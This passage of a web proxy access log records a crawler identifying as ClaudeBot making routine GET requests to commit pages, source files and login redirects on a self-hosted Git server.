192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" [Client 216.73.216.188] [Length 10261] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" [Client 216.73.216.188] [Length 10900] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log?display=source" [Client 216.73.216.188] [Length 42644] [Gzip 12.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf?display=source" [Client 216.73.216.188] [Length 11975] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 11033] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" [Client 216.73.216.188] [Length 10896] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore?display=source" [Client 216.73.216.188] [Length 12218] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 216.73.216.188] [Length 11610] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log?display=source" [Client 216.73.216.188] [Length 24964] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py?display=source" [Client 216.73.216.188] [Length 12967] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14868] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11522] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html?display=rendered" [Client 216.73.216.188] [Length 14371] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" [Client 216.73.216.188] [Length 10099] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Ffallback_http_error.log" [Client 216.73.216.188] [Length 23215] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 10125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt?display=source" [Client 216.73.216.188] [Length 11370] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11899] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15599] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 216.73.216.188] [Length 11892] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 12969] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10840] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14864] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 12765] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" [Client 216.73.216.188] [Length 10108] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 12685] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15948] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 216.73.216.188] [Length 11278] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:02 +0000] - 200 200 - GET https 